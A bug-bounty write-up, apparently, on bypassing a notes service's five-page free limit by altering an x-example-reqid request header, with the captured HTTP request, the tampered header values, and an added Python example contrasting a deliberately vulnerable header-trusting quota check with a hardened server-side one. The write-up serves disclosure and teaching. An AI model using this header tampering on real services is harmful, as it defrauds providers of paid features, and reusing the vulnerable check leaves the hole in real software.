Header manipulation to get the premier feature for free

Case Study

As always, let's call the company example.com. It lets you keep private notes/pages. The free version offers 5 pages; to upgrade from 5 pages to unlimited pages you need to pay some amount of money.

How the application works

  1. Click on create a page
  2. Enter page name and details
  3. Click on Save

After you save the 5th page, the Create page button is disabled.

POC

To create more pages, I first sent the request to Intruder and fired 100 null payloads, but with no success, as the server has some kind of verification.


The next thing that came to my mind was to look at the requests more closely, so I deleted all the pages and started creating them again to observe how the POST request changed.

In the header there is a parameter X-company_name-reqid: some_randomvalue followed by a number whose last digit was 1, 2, 3 and so on for successive pages.

POST /1/page HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/bugcrowd27
Content-Type: application/json
x-example-client-version: build-6226
x-example-reqid: randomvalue.2349934923493408030305501
Content-Length: 383
Connection: close
Cookie: 

{"name":"bugcrowd6","idOrganization":"5f6e234dffa0401f3f0dfd","prefs_permissionLevel":"org","prefs_selfJoin":true,"defaultLists":false,"prefs_background_url":"https://image_link9.com?test.jpg?w=2560&h=2048&q=90","token":"5e3a4fb3d19ce378asfsaf00/T8n7AaesrwgvRlmc6mu79JvYEHNGgfZQKzmykYp3Uflmasidfasf53fXJ2DLiP"}

To create unlimited pages I just had to change the value of the X-company_name-reqid header:

x-example-client-version: build-6226
x-example-reqid: randomvalue.2349934923493408030305501,2,3 and so on

and I was able to create unlimited pages.
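The root cause, as far as the write-up lets us tell, is that the server let a client-supplied header influence how many pages an account was allowed to have. The following is an added example (not the original post's code and not the vendor's implementation) that contrasts a quota check which reads the page number from the reqid header with one that counts pages server-side and treats the header as nothing more than a correlation id. The header name x-example-reqid and the JSON body fields are taken from the captured request; the parsing rule (last digit, or the digits after the final comma), FREE_PAGE_LIMIT, PageStore and the function names are assumptions made for illustration.

```python
"""Quota enforcement for page creation: client header vs. server-side count.

Added example, not the original post's code. The way the vulnerable handler
derives a page number from x-example-reqid is a hypothesis about the bug,
not a description of the real backend.
"""
from collections import defaultdict

FREE_PAGE_LIMIT = 5  # assumed free-tier limit, as stated in the write-up


class PageStore:
    """Minimal in-memory page store keyed by organization id (constructed for the example)."""

    def __init__(self):
        self.pages = defaultdict(list)

    def count(self, org_id):
        return len(self.pages[org_id])

    def add(self, org_id, name):
        self.pages[org_id].append(name)


def client_sequence(reqid):
    """Hypothetical parsing of the sequence number a client encodes in its reqid.

    The write-up describes values ending in 1, 2, 3 ... and a bypass that appends
    ',2', ',3' and so on, so we take the digits after the last comma if there is one,
    otherwise the final digit. Returns None when nothing numeric is found.
    """
    tail = reqid.rsplit(",", 1)[1] if "," in reqid else reqid[-1:]
    return int(tail) if tail.isdigit() else None


def create_page_vulnerable(headers, body, store):
    """Weak check: the per-account page number is whatever the client put in the header.

    Because the client controls the header, the limit only ever applies to clients
    that choose to honour it.
    """
    seq = client_sequence(headers.get("x-example-reqid", ""))
    if seq is None or seq > FREE_PAGE_LIMIT:
        return {"ok": False, "error": "limit reached"}
    store.add(body["idOrganization"], body["name"])
    return {"ok": True, "pages": store.count(body["idOrganization"])}


def create_page_hardened(headers, body, store, is_premium=False):
    """Correct check: the count comes from the server-side store and the plan flag.

    The header is kept only as a correlation id for logging; when the client's claimed
    sequence disagrees with the server's own count, that disagreement is surfaced so the
    caller can log or alert on tampering attempts.
    """
    org = body["idOrganization"]
    current = store.count(org)
    claimed = client_sequence(headers.get("x-example-reqid", ""))
    header_mismatch = claimed is not None and claimed != current + 1
    if not is_premium and current >= FREE_PAGE_LIMIT:
        return {"ok": False, "error": "limit reached", "header_mismatch": header_mismatch}
    store.add(org, body["name"])
    return {"ok": True, "pages": store.count(org), "header_mismatch": header_mismatch}


if __name__ == "__main__":
    # Constructed sample request: header and body shaped like the captured ones.
    headers = {"x-example-reqid": "randomvalue.2349934923493408030305501"}
    body = {"idOrganization": "5f6e234dffa0401f3f0dfd", "name": "bugcrowd6"}
    weak, strong = PageStore(), PageStore()
    for i in range(7):
        print("vulnerable", i + 1, create_page_vulnerable(headers, body, weak))
        print("hardened  ", i + 1, create_page_hardened(headers, body, strong))
```

With the same header sent seven times, the vulnerable handler accepts every request because the final digit is always 1, while the hardened handler refuses the sixth and seventh and flags that the client's claimed sequence no longer matches the server's count. The mismatch flag is the detection hook: a free-tier account whose reqid sequence repeatedly disagrees with the stored page count is exactly the pattern this bug produces.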


Reported
Accepted as P3 – $XXX dollars